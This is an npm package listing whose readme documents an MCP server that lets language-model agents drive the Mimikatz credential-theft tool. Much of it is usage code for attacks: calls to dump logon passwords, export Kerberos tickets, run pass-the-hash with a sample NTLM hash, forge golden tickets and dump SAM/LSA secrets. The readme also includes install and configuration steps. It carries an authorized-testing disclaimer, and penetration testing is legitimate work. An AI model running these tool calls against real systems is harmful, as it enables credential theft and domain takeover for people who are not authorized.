npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2025 – Pkg Stats / Ryan Hefner

gc-mimikatz-mcp

v1.0.0

Published

Model Context Protocol (MCP) server for interacting with Mimikatz security tool

Readme

Mimikatz MCP Server

A Model Context Protocol (MCP) server that provides a safe interface to interact with Mimikatz security tool through Large Language Models.

⚠️ Security Warning

This tool interfaces with Mimikatz, a powerful security auditing tool. It should only be used:

  • On systems you own or have explicit permission to test
  • In controlled environments for security research or authorized penetration testing
  • With full understanding of the legal and ethical implications

Misuse of this tool may violate laws and regulations. Always ensure you have proper authorization before use.

Features

The Mimikatz MCP server provides the following tools:

  • list-modules: List all available mimikatz modules and their commands
  • module-help: Get help for a specific mimikatz module
  • execute-command: Execute custom mimikatz commands
  • dump-credentials: Dump credentials using various methods (requires admin)
  • export-tickets: Export Kerberos tickets
  • pass-the-hash: Perform pass-the-hash attacks
  • golden-ticket: Create golden tickets
  • lsa-dump: Dump LSA secrets and cached credentials

Installation

  1. Install the package:
npm install -g gc-mimikatz-mcp
  1. Set the MIMIKATZ_PATH environment variable to point to your mimikatz.exe:
# Windows PowerShell
$env:MIMIKATZ_PATH = "C:\path\to\mimikatz.exe"

# Windows CMD
set MIMIKATZ_PATH=C:\path\to\mimikatz.exe

# Linux/Mac (if using Wine)
export MIMIKATZ_PATH="/path/to/mimikatz.exe"

Configuration

Add the server to your MCP client configuration:

{
  "mimikatz": {
    "command": "gc-mimikatz",
    "env": {
      "MIMIKATZ_PATH": "C:\\path\\to\\mimikatz.exe"
    }
  }
}

Usage Examples

List Available Modules

// This will show all available mimikatz modules
await use_mcp_tool("mimikatz", "list-modules", {});

Get Module Help

// Get help for the sekurlsa module
await use_mcp_tool("mimikatz", "module-help", {
  module: "sekurlsa"
});

Execute Custom Commands

// Execute a single command
await use_mcp_tool("mimikatz", "execute-command", {
  commands: "privilege::debug"
});

// Execute multiple commands
await use_mcp_tool("mimikatz", "execute-command", {
  commands: ["privilege::debug", "sekurlsa::logonpasswords"],
  requires_privilege: true
});

Dump Credentials

// Dump logon passwords (requires admin)
await use_mcp_tool("mimikatz", "dump-credentials", {
  method: "logonpasswords"
});

Export Kerberos Tickets

// Export tickets to current directory
await use_mcp_tool("mimikatz", "export-tickets", {});

// Export to specific path
await use_mcp_tool("mimikatz", "export-tickets", {
  export_path: "C:\\temp\\tickets"
});

Pass-the-Hash

await use_mcp_tool("mimikatz", "pass-the-hash", {
  user: "administrator",
  domain: "corp.local",
  ntlm: "8846f7eaee8fb117ad06bdd830b7586c",
  run_command: "cmd.exe"
});

Create Golden Ticket

await use_mcp_tool("mimikatz", "golden-ticket", {
  user: "administrator",
  domain: "corp.local",
  sid: "S-1-5-21-1234567890-123456789-123456789",
  krbtgt_hash: "1234567890abcdef1234567890abcdef",
  ticket_path: "golden.kirbi"
});

LSA Dump

// Dump SAM database
await use_mcp_tool("mimikatz", "lsa-dump", {
  method: "sam"
});

Requirements

  • Windows OS (Mimikatz is Windows-only)
  • Mimikatz executable
  • Administrator privileges for most operations
  • Node.js 16 or higher

Development

To build from source:

# Clone the repository
git clone https://github.com/GH05TCREW/mimikatz-mcp
cd mimikatz-mcp

# Install dependencies
npm install

# Build
npm run build

Legal Notice

This tool is provided for educational and authorized security testing purposes only. Users are responsible for complying with applicable laws and regulations. The authors assume no liability for misuse or damage caused by this software.

License

Apache-2.0

Author

GhostCrew